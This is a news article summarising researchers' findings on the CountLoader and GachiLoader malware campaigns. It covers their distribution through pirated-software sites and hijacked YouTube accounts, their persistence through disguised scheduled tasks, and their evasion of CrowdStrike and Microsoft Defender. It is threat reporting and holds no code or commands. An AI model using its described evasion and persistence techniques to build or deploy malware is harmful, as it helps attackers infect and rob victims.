Cybersecurity researchers have revealed details of an active malware campaign that leverages cracked software distribution websites to spread a new version of a stealthy and modular loader known as CountLoader. According to analysis shared by Cyderes Howler Cell Threat Intelligence team, the operation uses CountLoader as the initial foothold in a multistage intrusion designed for access, evasion, and the delivery of additional malware families. The loader has been observed in real world attacks since at least June 2025 and has previously been documented by Fortinet and Silent Push for its role in deploying payloads such as Cobalt Strike, AdaptixC2, PureHVNC RAT, Amatera Stealer, and cryptomining malware. The latest activity highlights continued development and increased sophistication in how CountLoader is being deployed.
The newly observed infection chain begins when users attempt to download pirated versions of legitimate software such as Microsoft Word. Victims are redirected to a MediaFire link that hosts a malicious ZIP archive containing two files, an encrypted ZIP file and a Microsoft Word document that provides the password needed to open the second archive. Inside the decrypted package is a renamed but legitimate Python interpreter labeled as Setup.exe. This executable has been configured to launch a malicious command that retrieves CountLoader version 3.2 from a remote server using mshta.exe. Once executed, the loader establishes persistence by creating a scheduled task designed to resemble a legitimate Google process, using a name such as GoogleTaskSystem136.0.7023.12 along with an identifier style string. The task is configured to execute every 30 minutes over a period of ten years, repeatedly invoking mshta.exe with a fallback command and domain.
Researchers noted that the malware incorporates logic to detect whether CrowdStrike Falcon is present on the infected system. This is done by querying the antivirus list through Windows Management Instrumentation. If the Falcon service is detected, CountLoader modifies its persistence behavior to launch mshta.exe via cmd.exe in the background. If not, it directly contacts the remote server using mshta.exe. Beyond persistence, the loader profiles the compromised host and retrieves additional payloads. The latest version introduces new capabilities, including propagation through removable USB drives and in memory execution through mshta.exe or PowerShell. The malware can download and execute executables, ZIP archives, DLL files, and MSI packages, remove its own scheduled task, collect extensive system information, and spread by creating malicious shortcuts alongside hidden legitimate files on removable media. In the campaign examined by Cyderes, the final payload delivered was ACR Stealer, an information stealing malware capable of harvesting sensitive data from infected systems.
The disclosure coincided with findings from Check Point detailing another loader campaign involving a heavily obfuscated JavaScript based malware called GachiLoader. Written in Node.js, GachiLoader is distributed through what researchers describe as a YouTube Ghost Network, consisting of compromised YouTube accounts used to spread malware via video descriptions and links. As many as 100 videos linked to the operation accumulated approximately 220,000 views and were uploaded from 39 hijacked accounts, with activity dating back to December 22, 2024. Many of these videos have since been removed by Google. One observed variant of GachiLoader deploys a second stage malware known as Kidkadi, which uses a novel Portable Executable injection method by loading a legitimate DLL and abusing Vectored Exception Handling to swap it with a malicious payload during execution.
Further analysis showed that GachiLoader can act as a delivery mechanism for information stealers such as Rhadamanthys. The loader performs multiple anti analysis checks, verifies whether it is running with elevated privileges using the net session command, and attempts to relaunch itself with administrative rights if required, often triggering a User Account Control prompt that victims may approve due to the malware being disguised as a popular software installer. In later stages, it attempts to terminate SecHealthUI.exe associated with Microsoft Defender and configures exclusion paths to prevent detection of malicious components stored in common system directories. Researchers noted that the techniques used by GachiLoader reflect a strong understanding of Windows internals and underscore a broader trend toward signed binary abuse, fileless execution, and sophisticated evasion tactics in modern malware operations.
Follow the SPIN IDG WhatsApp Channel for updates across the Smart Pakistan Insights Network covering all of Pakistan’s technology ecosystem.
